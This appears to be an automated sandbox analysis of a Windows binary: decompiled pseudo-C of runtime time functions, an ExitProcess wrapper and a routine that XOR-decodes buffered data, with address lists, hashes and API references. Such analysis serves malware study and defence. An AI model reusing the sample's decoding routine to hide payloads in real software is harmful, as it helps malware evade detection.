                                                                                                    control_flow_graph 903 423576-42358f 904 423591-42359b call 425208 call 4242d2 903->904 905 4235a9-4235be call 42b420 903->905 912 4235a0 904->912 905->904 911 4235c0-4235c3 905->911 913 4235d7-4235dd 911->913 914 4235c5 911->914 915 4235a2-4235a8 912->915 918 4235e9 call 42fb64 913->918 919 4235df 913->919 916 4235c7-4235c9 914->916 917 4235cb-4235d5 call 425208 914->917 916->913 916->917 917->912 923 4235ee-4235fa call 42f803 918->923 919->917 920 4235e1-4235e7 919->920 920->917 920->918 927 423600-42360c call 42f82d 923->927 928 4237e5-4237ef call 4242fd 923->928 927->928 933 423612-42361e call 42f857 927->933 933->928 936 423624-42362b 933->936 937 42369b-4236a6 call 42f939 936->937 938 42362d 936->938 937->915 945 4236ac-4236af 937->945 940 423637-423653 call 42f939 938->940 941 42362f-423635 938->941 940->915 946 423659-42365c 940->946 941->937 941->940 947 4236b1-4236ba call 42fbb4 945->947 948 4236de-4236eb 945->948 949 423662-42366b call 42fbb4 946->949 950 42379e-4237a0 946->950 947->948 956 4236bc-4236dc 947->956 951 4236ed-4236fc call 4305a0 948->951 949->950 959 423671-423689 call 42f939 949->959 950->915 960 423709-423730 call 4304f0 call 4305a0 951->960 961 4236fe-423706 951->961 956->951 959->915 966 42368f-423696 959->966 969 423732-42373b 960->969 970 42373e-423765 call 4304f0 call 4305a0 960->970 961->960 966->950 969->970 975 423773-423782 call 4304f0 970->975 976 423767-423770 970->976 979 423784 975->979 980 4237af-4237c8 975->980 976->975 981 423786-423788 979->981 982 42378a-423798 979->982 983 4237ca-4237e3 980->983 984 42379b 980->984 981->982 985 4237a5-4237a7 981->985 982->984 983->950 984->950 985->950 986 4237a9 985->986 986->980 987 4237ab-4237ad 986->987 987->950 987->980
                                                                                                    C-Code - Quality: 82%
                                                                                                    			E00423576(signed int __edx, signed int _a4, signed int _a8) {
                                                                                                    				char _v8;
                                                                                                    				char _v12;
                                                                                                    				char _v16;
                                                                                                    				signed int _v20;
                                                                                                    				char _v24;
                                                                                                    				intOrPtr _v52;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				void* __ebp;
                                                                                                    				signed int* _t81;
                                                                                                    				signed int _t83;
                                                                                                    				void* _t84;
                                                                                                    				signed int _t87;
                                                                                                    				signed int _t89;
                                                                                                    				signed int _t92;
                                                                                                    				void* _t94;
                                                                                                    				signed int _t95;
                                                                                                    				signed int _t98;
                                                                                                    				signed int _t100;
                                                                                                    				signed int _t102;
                                                                                                    				signed int _t105;
                                                                                                    				void* _t106;
                                                                                                    				signed int _t108;
                                                                                                    				void* _t109;
                                                                                                    				signed int _t111;
                                                                                                    				signed int _t117;
                                                                                                    				signed int _t126;
                                                                                                    				signed int _t132;
                                                                                                    				signed int* _t135;
                                                                                                    				signed int _t139;
                                                                                                    				signed int _t141;
                                                                                                    				void* _t143;
                                                                                                    				void* _t155;
                                                                                                    				signed int _t158;
                                                                                                    				signed int _t167;
                                                                                                    				signed int* _t171;
                                                                                                    				signed int _t173;
                                                                                                    				signed int _t177;
                                                                                                    				signed int _t178;
                                                                                                    				intOrPtr _t180;
                                                                                                    				signed int _t182;
                                                                                                    				void* _t184;
                                                                                                    				void* _t186;
                                                                                                    				signed int _t187;
                                                                                                    				signed int _t188;
                                                                                                    
                                                                                                    				_t167 = __edx;
                                                                                                    				_t171 = _a4;
                                                                                                    				_v12 = 0;
                                                                                                    				_v16 = 0;
                                                                                                    				_v8 = 0;
                                                                                                    				_t195 = _t171;
                                                                                                    				if(_t171 != 0) {
                                                                                                    					E0042B420(_t171, 0xff, 0x24);
                                                                                                    					_t177 = _a8;
                                                                                                    					__eflags = _t177;
                                                                                                    					if(__eflags == 0) {
                                                                                                    						goto L1;
                                                                                                    					} else {
                                                                                                    						__eflags =  *(_t177 + 4);
                                                                                                    						if(__eflags > 0) {
                                                                                                    							L9:
                                                                                                    							_t84 = 7;
                                                                                                    							__eflags =  *(_t177 + 4) - _t84;
                                                                                                    							if(__eflags < 0) {
                                                                                                    								L12:
                                                                                                    								E0042FB64(0, _t167, _t171, _t177, __eflags); // executed
                                                                                                    								_t87 = E0042F803( &_v12);
                                                                                                    								__eflags = _t87;
                                                                                                    								if(_t87 != 0) {
                                                                                                    									L45:
                                                                                                    									_push(0);
                                                                                                    									_push(0);
                                                                                                    									_push(0);
                                                                                                    									_push(0);
                                                                                                    									_push(0);
                                                                                                    									E004242FD(0, _t167);
                                                                                                    									asm("int3");
                                                                                                    									_push(_t177);
                                                                                                    									_t180 = _v52;
                                                                                                    									_t89 =  *(_t180 + 0xc);
                                                                                                    									__eflags = _t89 & 0x00000083;
                                                                                                    									if(__eflags != 0) {
                                                                                                    										_push(0);
                                                                                                    										_t139 = _a8;
                                                                                                    										 *(_t180 + 0xc) = _t89 & 0xffffffef;
                                                                                                    										_push(_t171);
                                                                                                    										__eflags = _t139 - 1;
                                                                                                    										if(_t139 != 1) {
                                                                                                    											_t173 = _a4;
                                                                                                    										} else {
                                                                                                    											_t173 = _a4 + E004230C5(_t139, _t167, _t180, _t180);
                                                                                                    											_t139 = 0;
                                                                                                    										}
                                                                                                    										E0042836B(_t167, _t180);
                                                                                                    										_t92 =  *(_t180 + 0xc);
                                                                                                    										__eflags = _t92;
                                                                                                    										if(_t92 >= 0) {
                                                                                                    											__eflags = _t92 & 0x00000001;
                                                                                                    											if((_t92 & 0x00000001) != 0) {
                                                                                                    												__eflags = _t92 & 0x00000008;
                                                                                                    												if((_t92 & 0x00000008) != 0) {
                                                                                                    													__eflags = _t92 & 0x00000400;
                                                                                                    													if((_t92 & 0x00000400) == 0) {
                                                                                                    														 *((intOrPtr*)(_t180 + 0x18)) = 0x200;
                                                                                                    													}
                                                                                                    												}
                                                                                                    											}
                                                                                                    										} else {
                                                                                                    											 *(_t180 + 0xc) = _t92 & 0xfffffffc;
                                                                                                    										}
                                                                                                    										_push(_t139);
                                                                                                    										_push(_t173);
                                                                                                    										_push(E0042816B(_t180));
                                                                                                    										_t94 = E0042818F(_t139, _t167, _t173, _t180, __eflags);
                                                                                                    										__eflags = _t94 - 0xffffffff;
                                                                                                    										_t78 = _t94 != 0xffffffff;
                                                                                                    										__eflags = _t78;
                                                                                                    										_t79 = (0 | _t78) - 1; // -1
                                                                                                    										_t95 = _t79;
                                                                                                    									} else {
                                                                                                    										_t98 = E00425208(__eflags);
                                                                                                    										 *_t98 = 0x16;
                                                                                                    										_t95 = _t98 | 0xffffffff;
                                                                                                    									}
                                                                                                    									return _t95;
                                                                                                    								} else {
                                                                                                    									_t100 = E0042F82D( &_v16);
                                                                                                    									__eflags = _t100;
                                                                                                    									if(_t100 != 0) {
                                                                                                    										goto L45;
                                                                                                    									} else {
                                                                                                    										_t102 = E0042F857( &_v8);
                                                                                                    										__eflags = _t102;
                                                                                                    										if(_t102 != 0) {
                                                                                                    											goto L45;
                                                                                                    										} else {
                                                                                                    											_t11 = _t177 + 4; // 0x858d0050
                                                                                                    											_t141 =  *_t11;
                                                                                                    											_t155 =  *_t177;
                                                                                                    											__eflags = _t141;
                                                                                                    											if(__eflags < 0) {
                                                                                                    												L23:
                                                                                                    												_t83 = E0042F939(_t171, _t177);
                                                                                                    												__eflags = _t83;
                                                                                                    												if(_t83 == 0) {
                                                                                                    													__eflags = _v12 - _t83;
                                                                                                    													if(__eflags == 0) {
                                                                                                    														L27:
                                                                                                    														asm("cdq");
                                                                                                    														_t182 = _t167;
                                                                                                    														asm("cdq");
                                                                                                    														_t143 =  *_t171 - _v8;
                                                                                                    														asm("sbb esi, edx");
                                                                                                    													} else {
                                                                                                    														_push(_t171);
                                                                                                    														_t126 = E0042FBB4(_t141, _t171, _t177, __eflags);
                                                                                                    														__eflags = _t126;
                                                                                                    														if(_t126 == 0) {
                                                                                                    															goto L27;
                                                                                                    														} else {
                                                                                                    															asm("cdq");
                                                                                                    															_t171[8] = 1;
                                                                                                    															asm("cdq");
                                                                                                    															_t143 =  *_t171 - _v16 + _v8;
                                                                                                    															asm("sbb edx, esi");
                                                                                                    															_a4 = _t167;
                                                                                                    															_t182 = _t167;
                                                                                                    														}
                                                                                                    													}
                                                                                                    													_t105 = E004305A0(_t143, _t182, 0x3c, 0);
                                                                                                    													 *_t171 = _t105;
                                                                                                    													__eflags = _t105;
                                                                                                    													if(_t105 < 0) {
                                                                                                    														_t143 = _t143 + 0xffffffc4;
                                                                                                    														 *_t171 = _t105 + 0x3c;
                                                                                                    														asm("adc esi, 0xffffffff");
                                                                                                    													}
                                                                                                    													_t106 = E004304F0(_t143, _t182, 0x3c, 0);
                                                                                                    													_t144 = _t167;
                                                                                                    													asm("cdq");
                                                                                                    													_t184 = _t106 + _t171[1];
                                                                                                    													asm("adc ebx, edx");
                                                                                                    													_t108 = E004305A0(_t184, _t167, 0x3c, 0);
                                                                                                    													_t171[1] = _t108;
                                                                                                    													__eflags = _t108;
                                                                                                    													if(_t108 < 0) {
                                                                                                    														_t184 = _t184 + 0xffffffc4;
                                                                                                    														_t171[1] = _t108 + 0x3c;
                                                                                                    														asm("adc ebx, 0xffffffff");
                                                                                                    													}
                                                                                                    													_t109 = E004304F0(_t184, _t144, 0x3c, 0);
                                                                                                    													_t145 = _t167;
                                                                                                    													asm("cdq");
                                                                                                    													_t186 = _t109 + _t171[2];
                                                                                                    													asm("adc ebx, edx");
                                                                                                    													_t111 = E004305A0(_t186, _t167, 0x18, 0);
                                                                                                    													_t171[2] = _t111;
                                                                                                    													__eflags = _t111;
                                                                                                    													if(_t111 < 0) {
                                                                                                    														_t186 = _t186 + 0xffffffe8;
                                                                                                    														_t171[2] = _t111 + 0x18;
                                                                                                    														asm("adc ebx, 0xffffffff");
                                                                                                    													}
                                                                                                    													_t158 = E004304F0(_t186, _t145, 0x18, 0);
                                                                                                    													__eflags = _t167;
                                                                                                    													if(__eflags < 0) {
                                                                                                    														L43:
                                                                                                    														_t171[3] = _t171[3] + _t158;
                                                                                                    														asm("cdq");
                                                                                                    														_t187 = 7;
                                                                                                    														_t117 = _t171[3];
                                                                                                    														_t171[6] = (_t171[6] + 7 + _t158) % _t187;
                                                                                                    														__eflags = _t117;
                                                                                                    														if(_t117 > 0) {
                                                                                                    															goto L38;
                                                                                                    														} else {
                                                                                                    															_t171[4] = 0xb;
                                                                                                    															_t171[3] = _t117 + 0x1f;
                                                                                                    															_t55 = _t158 + 0x16d; // 0x16d
                                                                                                    															_t171[7] = _t171[7] + _t55;
                                                                                                    															_t171[5] = _t171[5] - 1;
                                                                                                    														}
                                                                                                    													} else {
                                                                                                    														if(__eflags > 0) {
                                                                                                    															L37:
                                                                                                    															asm("cdq");
                                                                                                    															_t188 = 7;
                                                                                                    															_t39 =  &(_t171[3]);
                                                                                                    															 *_t39 = _t171[3] + _t158;
                                                                                                    															__eflags =  *_t39;
                                                                                                    															_t171[6] = (_t171[6] + _t158) % _t188;
                                                                                                    															L38:
                                                                                                    															_t42 =  &(_t171[7]);
                                                                                                    															 *_t42 = _t171[7] + _t158;
                                                                                                    															__eflags =  *_t42;
                                                                                                    														} else {
                                                                                                    															__eflags = _t158;
                                                                                                    															if(_t158 == 0) {
                                                                                                    																__eflags = _t167;
                                                                                                    																if(__eflags <= 0) {
                                                                                                    																	if(__eflags < 0) {
                                                                                                    																		goto L43;
                                                                                                    																	} else {
                                                                                                    																		__eflags = _t158;
                                                                                                    																		if(_t158 < 0) {
                                                                                                    																			goto L43;
                                                                                                    																		}
                                                                                                    																	}
                                                                                                    																}
                                                                                                    															} else {
                                                                                                    																goto L37;
                                                                                                    															}
                                                                                                    														}
                                                                                                    													}
                                                                                                    													goto L39;
                                                                                                    												}
                                                                                                    											} else {
                                                                                                    												if(__eflags > 0) {
                                                                                                    													L18:
                                                                                                    													asm("cdq");
                                                                                                    													asm("sbb ebx, edx");
                                                                                                    													_v24 = _t155 - _v8;
                                                                                                    													_v20 = _t141;
                                                                                                    													_t83 = E0042F939(_t171,  &_v24);
                                                                                                    													__eflags = _t83;
                                                                                                    													if(_t83 == 0) {
                                                                                                    														__eflags = _v12 - _t83;
                                                                                                    														if(__eflags == 0) {
                                                                                                    															L39:
                                                                                                    															_t83 = 0;
                                                                                                    														} else {
                                                                                                    															_push(_t171);
                                                                                                    															_t132 = E0042FBB4(_t141, _t171, _t177, __eflags);
                                                                                                    															__eflags = _t132;
                                                                                                    															if(_t132 == 0) {
                                                                                                    																goto L39;
                                                                                                    															} else {
                                                                                                    																asm("cdq");
                                                                                                    																_v24 = _v24 - _v16;
                                                                                                    																asm("sbb [ebp-0x10], edx");
                                                                                                    																_t83 = E0042F939(_t171,  &_v24);
                                                                                                    																__eflags = _t83;
                                                                                                    																if(_t83 == 0) {
                                                                                                    																	_t171[8] = 1;
                                                                                                    																	goto L39;
                                                                                                    																}
                                                                                                    															}
                                                                                                    														}
                                                                                                    													}
                                                                                                    												} else {
                                                                                                    													__eflags = _t155 - 0x3f480;
                                                                                                    													if(_t155 <= 0x3f480) {
                                                                                                    														goto L23;
                                                                                                    													} else {
                                                                                                    														goto L18;
                                                                                                    													}
                                                                                                    												}
                                                                                                    											}
                                                                                                    											goto L3;
                                                                                                    										}
                                                                                                    									}
                                                                                                    								}
                                                                                                    							} else {
                                                                                                    								if(__eflags > 0) {
                                                                                                    									goto L8;
                                                                                                    								} else {
                                                                                                    									__eflags =  *_t177 - 0x93406fff;
                                                                                                    									if(__eflags > 0) {
                                                                                                    										goto L8;
                                                                                                    									} else {
                                                                                                    										goto L12;
                                                                                                    									}
                                                                                                    								}
                                                                                                    							}
                                                                                                    						} else {
                                                                                                    							if(__eflags < 0) {
                                                                                                    								L8:
                                                                                                    								_t135 = E00425208(__eflags);
                                                                                                    								_t178 = 0x16;
                                                                                                    								 *_t135 = _t178;
                                                                                                    								goto L2;
                                                                                                    							} else {
                                                                                                    								__eflags =  *_t177;
                                                                                                    								if(__eflags >= 0) {
                                                                                                    									goto L9;
                                                                                                    								} else {
                                                                                                    									goto L8;
                                                                                                    								}
                                                                                                    							}
                                                                                                    						}
                                                                                                    					}
                                                                                                    				} else {
                                                                                                    					L1:
                                                                                                    					_t81 = E00425208(_t195);
                                                                                                    					_t178 = 0x16;
                                                                                                    					 *_t81 = _t178;
                                                                                                    					E004242D2();
                                                                                                    					L2:
                                                                                                    					_t83 = _t178;
                                                                                                    					L3:
                                                                                                    					return _t83;
                                                                                                    				}
                                                                                                    			}

















































                                                                                                    0x00423576
                                                                                                    0x00423581
                                                                                                    0x00423584
                                                                                                    0x00423587
                                                                                                    0x0042358a
                                                                                                    0x0042358d
                                                                                                    0x0042358f
                                                                                                    0x004235b1
                                                                                                    0x004235b6
                                                                                                    0x004235bc
                                                                                                    0x004235be
                                                                                                    0x00000000
                                                                                                    0x004235c0
                                                                                                    0x004235c0
                                                                                                    0x004235c3
                                                                                                    0x004235d7
                                                                                                    0x004235d9
                                                                                                    0x004235da
                                                                                                    0x004235dd
                                                                                                    0x004235e9
                                                                                                    0x004235e9
                                                                                                    0x004235f2
                                                                                                    0x004235f8
                                                                                                    0x004235fa
                                                                                                    0x004237e5
                                                                                                    0x004237e5
                                                                                                    0x004237e6
                                                                                                    0x004237e7
                                                                                                    0x004237e8
                                                                                                    0x004237e9
                                                                                                    0x004237ea
                                                                                                    0x004237ef
                                                                                                    0x004237f3
                                                                                                    0x004237f4
                                                                                                    0x004237f7
                                                                                                    0x004237fa
                                                                                                    0x004237fc
                                                                                                    0x0042380e
                                                                                                    0x0042380f
                                                                                                    0x00423815
                                                                                                    0x00423818
                                                                                                    0x00423819
                                                                                                    0x0042381c
                                                                                                    0x0042382e
                                                                                                    0x0042381e
                                                                                                    0x00423827
                                                                                                    0x00423829
                                                                                                    0x0042382b
                                                                                                    0x00423832
                                                                                                    0x00423837
                                                                                                    0x0042383b
                                                                                                    0x0042383d
                                                                                                    0x00423847
                                                                                                    0x00423849
                                                                                                    0x0042384b
                                                                                                    0x0042384d
                                                                                                    0x0042384f
                                                                                                    0x00423854
                                                                                                    0x00423856
                                                                                                    0x00423856
                                                                                                    0x00423854
                                                                                                    0x0042384d
                                                                                                    0x0042383f
                                                                                                    0x00423842
                                                                                                    0x00423842
                                                                                                    0x0042385d
                                                                                                    0x0042385e
                                                                                                    0x00423866
                                                                                                    0x00423867
                                                                                                    0x00423871
                                                                                                    0x00423874
                                                                                                    0x00423874
                                                                                                    0x00423879
                                                                                                    0x00423879
                                                                                                    0x004237fe
                                                                                                    0x004237fe
                                                                                                    0x00423803
                                                                                                    0x00423809
                                                                                                    0x00423809
                                                                                                    0x0042387e
                                                                                                    0x00423600
                                                                                                    0x00423604
                                                                                                    0x0042360a
                                                                                                    0x0042360c
                                                                                                    0x00000000
                                                                                                    0x00423612
                                                                                                    0x00423616
                                                                                                    0x0042361c
                                                                                                    0x0042361e
                                                                                                    0x00000000
                                                                                                    0x00423624
                                                                                                    0x00423624
                                                                                                    0x00423624
                                                                                                    0x00423627
                                                                                                    0x00423629
                                                                                                    0x0042362b
                                                                                                    0x0042369b
                                                                                                    0x0042369d
                                                                                                    0x004236a4
                                                                                                    0x004236a6
                                                                                                    0x004236ac
                                                                                                    0x004236af
                                                                                                    0x004236de
                                                                                                    0x004236e0
                                                                                                    0x004236e3
                                                                                                    0x004236e8
                                                                                                    0x004236e9
                                                                                                    0x004236eb
                                                                                                    0x004236b1
                                                                                                    0x004236b1
                                                                                                    0x004236b2
                                                                                                    0x004236b8
                                                                                                    0x004236ba
                                                                                                    0x00000000
                                                                                                    0x004236bc
                                                                                                    0x004236c2
                                                                                                    0x004236c5
                                                                                                    0x004236d0
                                                                                                    0x004236d3
                                                                                                    0x004236d5
                                                                                                    0x004236d7
                                                                                                    0x004236da
                                                                                                    0x004236da
                                                                                                    0x004236ba
                                                                                                    0x004236f3
                                                                                                    0x004236f8
                                                                                                    0x004236fa
                                                                                                    0x004236fc
                                                                                                    0x00423701
                                                                                                    0x00423704
                                                                                                    0x00423706
                                                                                                    0x00423706
                                                                                                    0x0042370f
                                                                                                    0x00423716
                                                                                                    0x0042371b
                                                                                                    0x0042371c
                                                                                                    0x00423722
                                                                                                    0x00423726
                                                                                                    0x0042372b
                                                                                                    0x0042372e
                                                                                                    0x00423730
                                                                                                    0x00423735
                                                                                                    0x00423738
                                                                                                    0x0042373b
                                                                                                    0x0042373b
                                                                                                    0x00423744
                                                                                                    0x0042374b
                                                                                                    0x00423750
                                                                                                    0x00423751
                                                                                                    0x00423757
                                                                                                    0x0042375b
                                                                                                    0x00423760
                                                                                                    0x00423763
                                                                                                    0x00423765
                                                                                                    0x0042376a
                                                                                                    0x0042376d
                                                                                                    0x00423770
                                                                                                    0x00423770
                                                                                                    0x0042377e
                                                                                                    0x00423780
                                                                                                    0x00423782
                                                                                                    0x004237af
                                                                                                    0x004237b5
                                                                                                    0x004237bc
                                                                                                    0x004237bd
                                                                                                    0x004237c0
                                                                                                    0x004237c3
                                                                                                    0x004237c6
                                                                                                    0x004237c8
                                                                                                    0x00000000
                                                                                                    0x004237ca
                                                                                                    0x004237cd
                                                                                                    0x004237d4
                                                                                                    0x004237d7
                                                                                                    0x004237dd
                                                                                                    0x004237e0
                                                                                                    0x004237e0
                                                                                                    0x00423784
                                                                                                    0x00423784
                                                                                                    0x0042378a
                                                                                                    0x00423791
                                                                                                    0x00423792
                                                                                                    0x00423795
                                                                                                    0x00423795
                                                                                                    0x00423795
                                                                                                    0x00423798
                                                                                                    0x0042379b
                                                                                                    0x0042379b
                                                                                                    0x0042379b
                                                                                                    0x0042379b
                                                                                                    0x00423786
                                                                                                    0x00423786
                                                                                                    0x00423788
                                                                                                    0x004237a5
                                                                                                    0x004237a7
                                                                                                    0x004237a9
                                                                                                    0x00000000
                                                                                                    0x004237ab
                                                                                                    0x004237ab
                                                                                                    0x004237ad
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004237ad
                                                                                                    0x004237a9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00423788
                                                                                                    0x00423784
                                                                                                    0x00000000
                                                                                                    0x00423782
                                                                                                    0x0042362d
                                                                                                    0x0042362d
                                                                                                    0x00423637
                                                                                                    0x0042363a
                                                                                                    0x00423641
                                                                                                    0x00423643
                                                                                                    0x00423647
                                                                                                    0x0042364a
                                                                                                    0x00423651
                                                                                                    0x00423653
                                                                                                    0x00423659
                                                                                                    0x0042365c
                                                                                                    0x0042379e
                                                                                                    0x0042379e
                                                                                                    0x00423662
                                                                                                    0x00423662
                                                                                                    0x00423663
                                                                                                    0x00423669
                                                                                                    0x0042366b
                                                                                                    0x00000000
                                                                                                    0x00423671
                                                                                                    0x00423674
                                                                                                    0x00423675
                                                                                                    0x0042367c
                                                                                                    0x00423680
                                                                                                    0x00423687
                                                                                                    0x00423689
                                                                                                    0x0042368f
                                                                                                    0x00000000
                                                                                                    0x0042368f
                                                                                                    0x00423689
                                                                                                    0x0042366b
                                                                                                    0x0042365c
                                                                                                    0x0042362f
                                                                                                    0x0042362f
                                                                                                    0x00423635
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00423635
                                                                                                    0x0042362d
                                                                                                    0x00000000
                                                                                                    0x0042362b
                                                                                                    0x0042361e
                                                                                                    0x0042360c
                                                                                                    0x004235df
                                                                                                    0x004235df
                                                                                                    0x00000000
                                                                                                    0x004235e1
                                                                                                    0x004235e1
                                                                                                    0x004235e7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004235e7
                                                                                                    0x004235df
                                                                                                    0x004235c5
                                                                                                    0x004235c5
                                                                                                    0x004235cb
                                                                                                    0x004235cb
                                                                                                    0x004235d2
                                                                                                    0x004235d3
                                                                                                    0x00000000
                                                                                                    0x004235c7
                                                                                                    0x004235c7
                                                                                                    0x004235c9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004235c9
                                                                                                    0x004235c5
                                                                                                    0x004235c3
                                                                                                    0x00423591
                                                                                                    0x00423591
                                                                                                    0x00423591
                                                                                                    0x00423598
                                                                                                    0x00423599
                                                                                                    0x0042359b
                                                                                                    0x004235a0
                                                                                                    0x004235a0
                                                                                                    0x004235a2
                                                                                                    0x004235a8
                                                                                                    0x004235a8

                                                                                                    APIs
                                                                                                    • _memset.LIBCMT ref: 004235B1
                                                                                                      • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                    • __gmtime64_s.LIBCMT ref: 0042364A
                                                                                                    • __gmtime64_s.LIBCMT ref: 00423680
                                                                                                    • __gmtime64_s.LIBCMT ref: 0042369D
                                                                                                    • __allrem.LIBCMT ref: 004236F3
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                                                                                                    • __allrem.LIBCMT ref: 00423726
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                                                                                                    • __allrem.LIBCMT ref: 0042375B
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                                                                                                    • __invoke_watson.LIBCMT ref: 004237EA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 384356119-0
                                                                                                    • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                    • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                                                                                                    • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                    • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1060 427b0b-427b1a call 427ad7 ExitProcess
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00427B0B(int _a4) {
                                                                                                    				void* _t4;
                                                                                                    
                                                                                                    				_t1 =  &_a4; // 0x423b69
                                                                                                    				E00427AD7(_t4,  *_t1);
                                                                                                    				ExitProcess(_a4);
                                                                                                    			}




                                                                                                    0x00427b0e
                                                                                                    0x00427b11
                                                                                                    0x00427b1a

                                                                                                    APIs
                                                                                                    • ___crtCorExitProcess.LIBCMT ref: 00427B11
                                                                                                      • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
                                                                                                      • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                                                                                                    • ExitProcess.KERNEL32 ref: 00427B1A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                    • String ID: i;B
                                                                                                    • API String ID: 2427264223-472376889
                                                                                                    • Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                                    • Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
                                                                                                    • Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                                    • Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1063 40ef50-40ef7a call 420c62 1066 40efdc-40efe2 1063->1066 1067 40ef7c 1063->1067 1068 40ef80-40ef85 call 420c62 1067->1068 1070 40ef8a-40efbd call 42b420 1068->1070 1073 40efc0-40efcf 1070->1073 1073->1073 1074 40efd1-40efda 1073->1074 1074->1066 1074->1068
                                                                                                    C-Code - Quality: 91%
                                                                                                    			E0040EF50(intOrPtr __ecx, signed int __edx, void* __eflags, signed int _a4) {
                                                                                                    				signed int _v8;
                                                                                                    				intOrPtr _v12;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* _t23;
                                                                                                    				intOrPtr _t24;
                                                                                                    				void* _t29;
                                                                                                    				intOrPtr* _t30;
                                                                                                    				signed int _t38;
                                                                                                    				signed int _t39;
                                                                                                    				signed int _t43;
                                                                                                    				void* _t44;
                                                                                                    				void* _t45;
                                                                                                    				void* _t46;
                                                                                                    
                                                                                                    				_t37 = __edx;
                                                                                                    				_t39 = _a4;
                                                                                                    				_t30 = __edx;
                                                                                                    				_v12 = __ecx;
                                                                                                    				_t23 = E00420C62(__edx, __edx, _t39, _t39 * 4);
                                                                                                    				_t43 = 0;
                                                                                                    				 *__edx = _t23;
                                                                                                    				_t46 = _t45 + 4;
                                                                                                    				_v8 = 0;
                                                                                                    				if(_t39 > 0) {
                                                                                                    					do {
                                                                                                    						_t24 = E00420C62(_t30, _t37, _t39, 0x25c); // executed
                                                                                                    						 *((intOrPtr*)( *_t30 + _t43 * 4)) = _t24;
                                                                                                    						E0042B420( *((intOrPtr*)( *_t30 + _t43 * 4)), 0, 0x97);
                                                                                                    						_t38 = _v8;
                                                                                                    						_t44 =  *(_v12 + _t38 * 4);
                                                                                                    						_t29 = memcpy( *( *_t30 + _t38 * 4), _t44, 0x25 << 2);
                                                                                                    						_t46 = _t46 + 0x1c;
                                                                                                    						_t39 = _t44 + 0x4a;
                                                                                                    						asm("movsw");
                                                                                                    						asm("movsb");
                                                                                                    						do {
                                                                                                    							 *( *( *_t30 + _t38 * 4) + _t29) =  *( *( *_t30 + _t38 * 4) + _t29) ^ 0x00000080;
                                                                                                    							_t29 = _t29 + 1;
                                                                                                    						} while (_t29 < 0x97);
                                                                                                    						_t37 = _t38 + 1;
                                                                                                    						_t43 = _t37;
                                                                                                    						_v8 = _t37;
                                                                                                    					} while (_t37 < _a4);
                                                                                                    				}
                                                                                                    				return _t23;
                                                                                                    			}

















                                                                                                    0x0040ef50
                                                                                                    0x0040ef59
                                                                                                    0x0040ef5c
                                                                                                    0x0040ef5e
                                                                                                    0x0040ef69
                                                                                                    0x0040ef6e
